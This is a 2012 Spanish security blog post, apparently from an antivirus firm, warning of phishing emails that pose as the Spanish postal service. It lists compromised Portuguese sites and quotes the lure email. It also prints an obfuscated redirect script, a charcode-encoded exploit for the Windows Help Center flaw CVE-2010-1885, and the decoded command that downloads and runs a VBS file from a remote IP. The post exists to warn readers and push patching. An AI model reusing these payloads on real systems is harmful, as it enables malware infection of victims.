AVALANCHA DE MAILS CON FALSO REMITENTE DE CORREOS QUE SON ENVIADOS MASIVAMENTE A MUCHAS CUENTAS CON DIFERENTE TEXTO Y ENLACE MALICIOSO A DIFERENTES SITES, TODOS ELLOS DE PORTUGAL:

Se estan recibiendo muchos mails con falso remitente de correos, con un link apuntando a servidores hackeados de Portugal, como por ejemplo:

oficinadidactica.pt. PT Portugal     39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L

farmaciadocaramulo.com. PT Portugal     39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L

glamcommunications.com. PT Portugal     39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L

cityalarme.pt. PT Portugal     39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L

mr-associados.com. PT Portugal     39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L

webgeneration.net. PT Portugal     39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L

extremetech.com.pt. PT Portugal     39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L

pedroalves.net. PT Portugal     39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L

servk.com. PT Portugal     39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L

regivete.com. PT Portugal     39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L

________

El texto es diferente en cada uno, pero basicamente es mas de lo mismo:

 

——– Mensaje original ——–

Asunto:
Fecha:  Thu, 14 Jun 2012 19:49:00 -0300
De:  $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:klaps@satinfo.es”>klaps@satinfo.es>, <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:zonavirus@satinfo.es”>zonavirus@satinfo.es>, <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:comercial@satinfo.es”>comercial@satinfo.es>
Estimado cliente,
Ha llegado un paquete postal a su nombre. Es necesario recogerlo en la sucursal más cercana de correos.es.
Para ello imprima el resguardo e indique, en qué sucursal quiere recoger el paquete.

Pulse aquí —-> (ENLACE MALICIOSO en esta caso a http://oficinadidactica.pt/correos.es.html) para imprimir el resguardo y escoger la sucursal.

Estado del paquete: Listo para su entrega
Tipo de servicio: Express
El número de su paquete: ?????????????
Seguro: Sí

Atención! Si usted no retira el paquete durante los proximos 30 días se le cobrará una comisión de 9.95 euros por cada día adícional.
Le pedimos recoger el paquete en menos de 30 días después de recibir este aviso.

Le agradecemos el uso de nuestros servicios,
correos.es

_______________

En cada enlace se ejecuta el siguiente script:

hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,110,105,99,101,111,102,102,105,99,101,99,111,109,116,114,105,115,116,97,116,101,46,105,110,102,111,47,100,97,116,97,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,57,55,100,49,57,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</script>

vamos a monitorizar dicho script y veremos lo que hace, pero de entrada, como siempre, recomendamos no ejecutar ningun fichero anexado a mails no solicitados, asi como no pulsar en ningun enlace ni imagen de los mismos.

 

Mientras tanto, cuidado con ellos !!!

saludos

ms, 15-6-2012

 

ANEXO IMPORTANTE
El script en cuestión ejecuta estos comandos:

cmd /c echo B=”l.vbs”:With CreateObject(“MSXML2.XMLHTTP”):.open “GET”,”http://67.207.198.243/Home/data/hcp_vbs.php?f=16&d=0″,false:.send():Set A = CreateObject(“Scripting.FileSystemObject”):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + “\” + B):D.WriteLine .responseText:End With:D.Close:CreateObject(“WScript.Shell”).Run A.GetSpecialFolder(2) + “\” + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe */

que resultan ser un exploit de la conocida vulnerabilidad CVE-2010-1885, que Microsoft ya solucionó con el parche MS10-042, segun puede verse en :
http://www.microsoft.com/latam/technet/seguridad/boletines/2010/ms10-042.mspx

Especialmente es crítico en los Windows XP SP2, y Windows Server 2003, en los que se supone que se han instalado los parches , y sino, conviene lanzar un windowsupdate y actualizarlos (www.update.microsoft.com)

ms.

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies